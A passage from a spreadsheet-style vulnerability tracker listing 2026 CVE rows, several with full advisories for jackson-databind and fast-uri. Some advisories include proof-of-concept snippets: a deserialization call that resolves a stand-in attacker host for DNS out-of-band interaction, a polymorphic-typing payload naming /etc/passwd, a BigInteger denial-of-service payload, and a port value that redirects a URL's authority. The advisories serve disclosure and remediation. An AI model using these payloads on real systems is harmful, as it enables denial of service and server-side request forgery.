RESULT: VULNERABLE - 1000000-digit BigInteger parsed from a 1000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
Interpretation: a normal `"P1Y"` value parses in tens of milliseconds; a ~1 MB attacker payload consumes **~11 s** and a ~5 MB payload **~293 s** of single-thread CPU — a 5–6 order-of-magnitude amplification. The super-linear growth (≈26× cost for 5× payload) is consistent with the JDK's O(n²) `BigInteger(String)` constructor. The cost occurs inside `DatatypeFactory.newDuration`, downstream of jackson-core's `StreamReadConstraints` (independently confirmed: the same digit sequence supplied as a bare JSON *number* token is rejected with `StreamConstraintsException`, whereas inside a string token it is not bounded).
## Impact
An unauthenticated attacker can stall a request-processing thread for tens of seconds to minutes and allocate a large `BigInteger`/`BigDecimal` from a single small request. Because the cost is CPU-bound and super-linear, a handful of concurrent requests can saturate the server's worker threads and CPU, denying service to all users. The exposure requires only that a bound type expose a `javax.xml.datatype.Duration` or `XMLGregorianCalendar` field  common in applications that ingest XML-schema derived data, SOAP/JAXB-adjacent models, or configuration carrying XSD durations — and fires under the default mapper with no polymorphic typing.
## Recommended Fix
Apply the same validate-length-then-parse idiom the core `NumberDeserializers` already use:
1. In `CoreXMLDeserializers.Std._deserialize`, enforce a maximum raw-string length before
   calling `newDuration(value)` / `newXMLGregorianCalendar(value)` — e.g. reject inputs
   longer than `ctxt.streamReadConstraints().getMaxNumberLength()` (or a dedicated bound),
   routing over-length input through `ctxt.handleWeirdStringValue(...)`.
2. Alternatively, validate the lexical form against a bounded regex and cap the digit count
   of each numeric component before delegating to `DatatypeFactory`.
3. Document that `Duration` / `XMLGregorianCalendar` fields bound from untrusted input must
   be length-limited at the transport layer.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68497</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71485</t>
        </is>
      </c>
      <c r="D36" s="5" t="inlineStr"/>
      <c r="E36" s="5" t="inlineStr"/>
      <c r="F36" s="5" t="inlineStr"/>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/centrifugal/centrifugo, Go:github.com/centrifugal/centrifugo/v3, Go:github.com/centrifugal/centrifugo/v4, Go:github.com/centrifugal/centrifugo/v5, Go:github.com/centrifugal/centrifugo/v6</t>
        </is>
      </c>
      <c r="M36" s="5" t="inlineStr">
        <is>
          <t>6.9.0</t>
        </is>
      </c>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr"/>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Centrifugo: Client-forgeable headers emulation lets any client spoof headers forwarded to proxy backends in github.com/centrifugal/centrifugo</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71485</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77310</t>
        </is>
      </c>
      <c r="D37" s="5" t="inlineStr"/>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M37" s="5" t="inlineStr">
        <is>
          <t>2.18.9, 2.21.5, 2.22.1, 3.1.5, 3.2.1</t>
        </is>
      </c>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr"/>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>### Summary
CVE-2026-54514 (GHSA-hgj6-7826-r7m5) fixed an eager-DNS-resolution / SSRF issue in jackson-databind's deserialization of `java.net.InetSocketAddress` by switching to `InetSocketAddress.createUnresolved(...)` (PR #5951, commit 1f5a1037, released in 2.18.8 / 2.21.4 / 3.1.4). That fix did not cover the sibling `java.net.InetAddress` branch in the very same `FromStringDeserializer.Std._deserialize()` switch statement, which still calls `InetAddress.getByName(value)` and therefore performs an eager forward DNS lookup on attacker-controlled input at deserialization time. The fix is incomplete: the same vulnerability class remains reachable through `InetAddress`.
### Details
File: src/main/java/com/fasterxml/jackson/databind/deser/std/FromStringDeserializer.java
Sibling cases in the same switch:
- Line 357-358 (UNFIXED):
    case STD_INET_ADDRESS:
        return InetAddress.getByName(value);     // eager forward DNS lookup
- Line 359-381 + helper at 494-496 (FIXED by PR #5951):
    protected InetSocketAddress _inetSocketAddress(String host, int port) {
        // 05-May-2026, tatu: [databind#5951] Prevent DNS lookup:
        return InetSocketAddress.createUnresolved(host, port);   // no DNS
    }
`InetAddress` is a registered standard string-like scalar type (FromStringDeserializer.types() line 73; findDeserializer() maps it to STD_INET_ADDRESS at line 119-120). Any value deserialized into an `InetAddress`-typed target — a plain POJO field, a polymorphic subtype, or a default-typing-permitted slot — reaches `InetAddress.getByName(attackerControlledString)`, which invokes the OS/JVM resolver and performs forward DNS resolution before any application validation.
The parent fix's own added unit test asserts `address.isUnresolved()` with the comment "should NOT resolve address", confirming that performing DNS resolution during deserialization is precisely the behavior being treated as the vulnerability. The InetAddress branch still violates that property.
Verified against the FIXED released artifact (jackson-databind 2.18.8, from Maven Central): decompiled bytecode shows the InetSocketAddress branch now routes through `_inetSocketAddress -&gt; createUnresolved`, while `InetAddress.getByName` is still emitted unchanged in the InetAddress branch.
### PoC
Lab-only, zero network egress. Run against the fixed jackson-databind 2.18.8.
A custom JDK InetAddressResolver SPI (Java 18+) counts forward lookups locally and answers with loopback, so no traffic leaves the host:
    ObjectMapper m = new ObjectMapper();
    // InetSocketAddress (patched): 0 resolver lookups, isUnresolved=true
    m.readValue("\"internal-metadata.attacker-oob.example:8080\"", InetSocketAddress.class);
    // InetAddress (unpatched sibling): 1 resolver lookup on the attacker host
    m.readValue("\"internal-metadata.attacker-oob.example\"", InetAddress.class);
Observed output (jackson 2.18.8):
    [A] InetSocketAddress  isUnresolved=true  resolverLookups=0  lastHost=null
    [B] InetAddress        value=localhost/127.0.0.1  resolverLookups=1  lastHost=internal-metadata.attacker-oob.example
A standalone variant (no SPI) using an RFC-6761 `.invalid` canary host shows the same: deserializing into InetAddress raises UnknownHostException (the OS resolver was invoked), while InetSocketAddress stays unresolved. Full source in PocResolverCount.java and PocInetAddressIncompleteFix.java.
Reachability with a plain field (no annotations, no polymorphism, no default typing):
    static class Config { public InetAddress bindHost; public int port; }
    mapper.readValue("{\"bindHost\":\"poc-reach.example\",\"port\":1}", Config.class);
    // -&gt; resolver invoked on "poc-reach.example"
### Impact
An attacker who can influence JSON deserialized into an `InetAddress` target can force the application to perform outbound forward DNS lookups for attacker-chosen hostnames at deserialization time, before any application-level validation. This yields a DNS-based SSRF / OOB primitive: out-of-band exfiltration / interaction via DNS callbacks, and blind probing of whether internal hostnames resolve (internal-host enumeration). This is the same impact class and trust boundary for which CVE-2026-54514 (CVSS 5.3, CWE-918) was assigned to the InetSocketAddress branch. It is a DNS-lookup / blind SSRF primitive, not arbitrary HTTP SSRF or RCE; it does not itself open a socket.
Suggested fix: avoid eager resolution for InetAddress as well — e.g. defer resolution, validate the host string before resolving, or provide an opt-in/opt-out consistent with the InetSocketAddress fix (there is no direct unresolved-InetAddress equivalent, so deferring/validating or documenting the resolution is the practical mitigation).
Credit : Ta Duc Thien</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77310</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77339</t>
        </is>
      </c>
      <c r="D38" s="5" t="inlineStr"/>
      <c r="E38" s="5" t="inlineStr"/>
      <c r="F38" s="5" t="inlineStr"/>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/f1bonacc1/process-compose</t>
        </is>
      </c>
      <c r="M38" s="5" t="inlineStr">
        <is>
          <t>1.120.0</t>
        </is>
      </c>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr"/>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Process Compose: Browser DNS rebinding lets websites control local process-compose MCP tools in github.com/f1bonacc1/process-compose</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77339</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8074</t>
        </is>
      </c>
      <c r="D39" s="5" t="inlineStr"/>
      <c r="E39" s="5" t="inlineStr"/>
      <c r="F39" s="5" t="inlineStr"/>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M39" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr"/>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't enforce bot-specific permission checks on the user active status endpoint in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8074</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81505</t>
        </is>
      </c>
      <c r="D40" s="5" t="inlineStr"/>
      <c r="E40" s="5" t="inlineStr"/>
      <c r="F40" s="5" t="inlineStr"/>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/frain-dev/convoy</t>
        </is>
      </c>
      <c r="M40" s="5" t="inlineStr">
        <is>
          <t>0.9.3-0.20260724092134-1cc67cd16fb1</t>
        </is>
      </c>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr"/>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Convoy: Cross-Tenant Source IDOR Leaks Plaintext Message Broker Credentials in github.com/frain-dev/convoy</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81505</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81871</t>
        </is>
      </c>
      <c r="D41" s="5" t="inlineStr"/>
      <c r="E41" s="5" t="inlineStr"/>
      <c r="F41" s="5" t="inlineStr"/>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>go, grpc</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>Go:go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="M41" s="5" t="inlineStr">
        <is>
          <t>0.21.0</t>
        </is>
      </c>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr"/>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go: Log gRPC exporter ignores env TLS certs, bypassing mTLS/pinning in go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81871</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D42" s="5" t="inlineStr"/>
      <c r="E42" s="5" t="inlineStr"/>
      <c r="F42" s="5" t="inlineStr"/>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M42" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr"/>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>CoreDNS: Unauthenticated memory exhaustion in custom transports in github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83557</t>
        </is>
      </c>
      <c r="D43" s="5" t="inlineStr"/>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M43" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr"/>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>### Summary
`DefaultBaseTypeLimitingValidator` — the `PolymorphicTypeValidator` used automatically whenever `@JsonTypeInfo` is applied without an explicitly configured custom validator — denies polymorphic resolution only for nine specific "unsafe base types" (`Object`, `Serializable`, `Closeable`, `AutoCloseable`, `Cloneable`, `Runnable`, `java.util.logging.Handler`, `javax.naming.Referenceable`, `javax.sql.DataSource`). Its `isSafeSubType()` returns `true` unconditionally for every other base type. `java.lang.Comparable` is not in that list, despite being implemented by a very large fraction of JDK and application classes — comparable in breadth to `Serializable`, which is denylisted for exactly that reason. An application with an `@JsonTypeInfo`-annotated `Comparable`-typed property, and no custom validator configured, will accept a type identifier for essentially any class implementing `Comparable`.
### Details
**Affected file:** `src/main/java/tools/jackson/databind/jsontype/DefaultBaseTypeLimitingValidator.java`
```java
private final static class UnsafeBaseTypes {
    private final Set&lt;String&gt; UNSAFE = new HashSet&lt;&gt;();
    {
        UNSAFE.add(Object.class.getName());
        UNSAFE.add(java.io.Closeable.class.getName());
        UNSAFE.add(java.io.Serializable.class.getName());
        UNSAFE.add(AutoCloseable.class.getName());
        UNSAFE.add(Cloneable.class.getName());
        UNSAFE.add(Runnable.class.getName());          // [databind#5014]
        UNSAFE.add("java.util.logging.Handler");
        UNSAFE.add("javax.naming.Referenceable");
        UNSAFE.add("javax.sql.DataSource");
        // java.lang.Comparable is NOT present here
    }
}
protected boolean isSafeSubType(DatabindContext ctxt,
        JavaType baseType, JavaType subType) {
    return true;   // unconditional for every base type not in UNSAFE
}
```
The class's own JavaDoc acknowledges the design (*"Note that when using potentially unsafe base type like `java.lang.Object` a custom implementation... is needed"*), so the trade-off of leaving broad base types unrestricted is intentional. The gap is that `Comparable` has the same breadth of implementers as the types this class *does* restrict, and its absence looks like an oversight rather than a deliberate choice — consistent with the ongoing, incremental nature of this list (`Runnable` was added recently for issue #5014).
This is specific to the **default, unconfigured validator** reached via bare `@JsonTypeInfo` usage. Global "Default Typing" via `activateDefaultTyping()` is **not** affected, because that method structurally requires an explicit `PolymorphicTypeValidator` argument — a correctly-configured `BasicPolymorphicTypeValidator` rejects the same payload under `activateDefaultTyping()`.
### PoC
Built entirely from source (jackson-databind + jackson-core + jackson-annotations, `javac`, OpenJDK 21, no third-party gadget libraries, no network access):
**1. Sanity check (benign class, confirms the mechanism fires):**
```java
static class SafeThing implements Comparable&lt;SafeThing&gt; {
    public String name;
    public SafeThing() {}
    public int compareTo(SafeThing o) { return 0; }
}
static class Holder {
    @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
    public Comparable&lt;?&gt; value;
}
ObjectMapper mapper = JsonMapper.builder().build();   // no custom PTV
String json = "{\"value\":{\"@class\":\"...SafeThing\",\"name\":\"hello\"}}";
Holder h = mapper.readValue(json, Holder.class);
// RESULT: ACCEPTED, class=...SafeThing
```
**2. Real JDK class substitution:**
```java
String json = "{\"value\":[\"java.io.File\",\"/etc/passwd\"]}";
Holder h = mapper.readValue(json, Holder.class);
// RESULT: ACCEPTED, class=java.io.File value=/etc/passwd
```
**3. Negative control — Default Typing with an explicit custom PTV:**
```java
PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
    .allowIfSubType("PtvGapTest4").build();
ObjectMapper mapper = JsonMapper.builder()
    .activateDefaultTyping(ptv, DefaultTyping.NON_FINAL).build();
// same java.io.File payload
// RESULT: REJECTED - InvalidTypeIdException: "...denied resolution"
```
**Observed output:**
$ java -cp .:build/classes PtvGapTest3
Trying: {"value":["java.io.File","/etc/passwd"]}
ACCEPTED, class=java.io.File value=/etc/passwd
$ java -cp .:build/classes PtvGapTest4
Trying malicious substitution: ["PtvGapTest4$Holder",{"value":["java.io.File","/etc/passwd"]}]
REJECTED - InvalidTypeIdException: Could not resolve type id 'java.io.File' as a
subtype of java.lang.Comparable: Configured PolymorphicTypeValidator denied resolution
### Impact
Any application declaring an `@JsonTypeInfo`-annotated property or class with `Comparable` as its base type, without a separately configured restrictive `PolymorphicTypeValidator`, will accept a type identifier for essentially any class implementing `Comparable`. Concrete impact is demonstrated via `java.io.File`: an attacker can cause construction of a `File` object for an arbitrary, attacker-chosen path. On its own this is a controlled-object-instantiation primitive; if the application later calls path-sensitive or mutating methods on the received value, this becomes a path-traversal-adjacent primitive. 
**Suggested remediation:**
1. Add `java.lang.Comparable` to `UnsafeBaseTypes.UNSAFE`.
2. Audit other broad JDK interfaces (`java.lang.Iterable`, `java.util.EventListener`) for the same gap.
3. Consider a narrower default for `isSafeSubType()` for base types outside the fixed denylist, rather than unconditional `true`.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83557</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84292</t>
        </is>
      </c>
      <c r="D44" s="5" t="inlineStr"/>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M44" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr"/>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` serializes the `port` component of a URI without validating it. When recomposing the authority, `fast-uri` escapes the userinfo and host components but concatenates the port verbatim, so a `port` value that is not a sequence of digits can inject authority delimiters. For example, serializing a component whose `port` is `@127.0.0.1:8124` produces `http://trusted.example:@127.0.0.1:8124/app`, demoting the intended host to userinfo and pointing the authority at an attacker-controlled host. Both `fast-uri` and Node's `URL` read the result back as the attacker's host with no error, so re-validating the built URI does not catch it.
This affects applications that build URIs from parts and assign untrusted data to the `port` component (for example a fixed host from configuration and a port taken from user input or a service record). The same path is reachable through `serialize()`, `normalize()`, and `equal()` in their object forms. A `port` obtained from `parse()` is always digits and is not affected.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `recomposeAuthority` now rejects any port that is not `*DIGIT` per RFC 3986. All users should upgrade.
### Workarounds
If upgrading is not immediately possible, validate the `port` value against the RFC 3986 grammar (digits only) before passing a component to `serialize()`, `normalize()`, or `equal()`, and reject anything else, for example `if (!/^\d*$/.test(String(port))) throw new Error('invalid port')`.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84292</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84394</t>
        </is>
      </c>
      <c r="D45" s="5" t="inlineStr"/>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M45" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr"/>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` accepts a host that contains an unbalanced or misplaced authority bracket (`[` or `]`) without reporting an error. A host that starts with `[` but does not end with `]`, such as `[@127.0.0.1`, is neither validated as an IP literal nor canonicalized as a domain name, so `parse()` returns it as the host with `error` undefined, while Node's `URL` (and `http.get`, `axios`, `got`, and other clients built on it) resolve the same string to `127.0.0.1`. An application that reads `parse().host` to make a host decision (an SSRF denylist, a redirect allowlist, or proxy routing) and then passes the original URL to an HTTP client evaluates its policy against a string that is not the host the request reaches. The same host is carried through `normalize()`, `equal()`, and `resolve()`.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `parse()` now reports `URI host is malformed.` for any host that contains a bracket but is not a valid `[IPv6]` literal. All users should upgrade.
### Workarounds
If upgrading is not immediately possible, reject any URL whose host contains a `[` or `]` that is not a well-formed IPv6 literal before making a host decision. Clients that fail closed on credential-bearing URLs, such as Node's global `fetch()`, are not affected by the reported vector.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84394</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
